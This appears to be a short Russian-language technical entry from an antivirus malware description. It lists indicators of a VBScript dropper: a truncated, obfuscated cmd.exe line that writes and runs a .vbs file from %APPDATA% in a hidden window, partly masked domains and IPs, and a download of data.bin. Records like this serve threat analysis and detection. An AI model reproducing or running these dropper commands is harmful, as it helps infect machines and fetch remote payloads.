Техническая информация
- '<SYSTEM32>\cmd.exe' /V /C set "B09=%APPDATA%\%RANDOM%.vbs" && (for %i in ("Dim M58C" "suB FABl52q(V5BxJQw)" "IJQG=84" "dIM XOMti" "YifP6Bj=81" "WM="VM1"" "CmuWvOf=7" "sET XOMti=cREATeOBjEct(PP0bLU("0C75190973781E4...
- %APPDATA%\9423.vbs
- 'pa###louf.com':80
- '20#.#7.8.251':80
- http://pa###louf.com/data.bin
- DNS ASK pa###louf.com
- '<SYSTEM32>\wscript.exe' "%APPDATA%\9423.vbs"
- '<SYSTEM32>\cmd.exe' /V /C set "B09=%APPDATA%\%RANDOM%.vbs" && (for %i in ("Dim M58C" "suB FABl52q(V5BxJQw)" "IJQG=84" "dIM XOMti" "YifP6Bj=81" "WM="VM1"" "CmuWvOf=7" "sET XOMti=cREATeOBjEct(PP0bLU("0C75190973781E4...' (со скрытым окном)